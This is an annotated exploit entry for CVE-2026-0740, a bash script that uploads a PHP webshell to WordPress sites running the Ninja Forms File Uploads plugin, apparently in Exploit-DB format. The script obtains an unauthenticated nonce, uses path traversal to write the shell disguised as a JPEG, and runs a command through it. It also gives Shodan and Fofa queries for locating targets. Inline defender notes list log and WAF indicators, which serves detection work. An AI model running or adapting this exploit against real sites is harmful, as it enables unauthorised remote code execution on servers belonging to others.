[webapps] Ninja Forms Uploads - Unauthenticated PHP File Upload

# Exploit Title:    Ninja Forms Uploads - Unauthenticated PHP File Upload
# Date:             2026-04-09
# Exploit Author:   Sélim Lanouar (@whattheslime)
# Vendor Homepage:  https://ninjaforms.com/
# Software Link:    https://ninjaforms.com/extensions/file-uploads/
# Version:          3.3.24
# Tested on:        WordPress (6.9.3) on Apache and Nginx servers
# CVE:              CVE-2026-0740
# Fofa Query:       body="nfpluginsettings.js?ver="
# Shodan Query:     http.html:"nfpluginsettings.js?ver="
# =============================================================================

# Top-level script: takes one argument (the site base URL) and runs the
# three steps below in sequence. There is no shebang and no `set -euo
# pipefail`, so a failing step (for example an empty nonce) does not stop
# the later steps from running.
if [ "$#" -ne 1 ]; then
    echo "Usage: $0 <target_url>"
    exit 1
fi

# Base URL of the WordPress site. It is later embedded unquoted in a string
# that is passed to `eval`, so shell metacharacters or a single quote in it
# are interpreted by the shell instead of reaching curl literally.
target=$1

# 16 random digits in the range 1-9, reused as both form_id and field_id.
# The trailing `echo` appends a newline that the $(...) substitution strips.
field_id=$(head /dev/urandom | tr -dc '1-9' | head -c 16 ; echo)
# Fixed, predictable file name under /tmp (no mktemp) and never removed.
# Defender note: the one-line `system($_GET["cmd"])` payload is a classic
# webshell signature; an unexpected .php file under wp-content (where the
# final curl below expects it to land) is the on-disk artefact to alert on.
file_name=webshell.php
echo "[-] Writing webshell in /tmp/$file_name..."
echo '<?php system($_GET["cmd"]); ?>' > /tmp/$file_name

# Step 1: obtain an upload nonce from the plugin's admin-ajax action. No
# cookies or credentials are sent. `jq -r` prints the literal string "null"
# when .data.nonce is absent, and nothing checks for that, so a failed
# request still proceeds to the upload. Unlike the next request this curl
# has no -k, so an untrusted TLS certificate makes this step fail first.
# Defender note: POSTs to admin-ajax.php with action=nf_fu_get_new_nonce
# from an unauthenticated session are the first observable step in logs.
echo "[-] Fetching nonce for random field_id $field_id..."
nonce=$(curl -s -X POST "$target/wp-admin/admin-ajax.php" \
     -d "action=nf_fu_get_new_nonce&field_id=$field_id" | jq -r '.data.nonce')
echo "[+] Got nf_fu_upload nonce: $nonce"

# Step 2: multipart upload through action=nf_fu_upload. The image_jpg field
# carries a "../../../" traversal prefix, and the file part is declared as
# image.jpg / image/jpeg although its content is PHP. The response is only
# echoed, never inspected for success.
# Defender note: a form field containing "../" on this endpoint, or a
# multipart part whose declared image type does not match PHP content, is
# the request-level indicator; a WAF or request-log rule on either is cheap.
echo "[-] Uploading webshell..."
response=$(curl -ks -X POST "$target/wp-admin/admin-ajax.php" \
     -F "action=nf_fu_upload" \
     -F "nonce=$nonce" \
     -F "form_id=$field_id" \
     -F "field_id=$field_id" \
     -F "image_jpg=../../../$file_name" \
     -F "files-$field_id=@/tmp/$file_name;filename=image.jpg;type=image/jpeg")
echo "[+] Upload response: $response"

# Step 3: request the uploaded file with ?cmd=id. The command line is built
# as a string and run through unquoted `eval`, so $target is re-parsed by
# the shell; a direct curl call with quoted arguments would avoid that.
# Success is not checked: an empty $result prints the same as real output.
# Defender note: GET requests for wp-content/<name>.php carrying a cmd=
# query parameter are the post-exploitation indicator to hunt for.
command="curl -ks '$target/wp-content/$file_name?cmd=id'"
echo "[-] Executing the 'id' command via the uploaded webshell: $command"
result=$(eval $command)
echo "[+] Command output: $result"
            
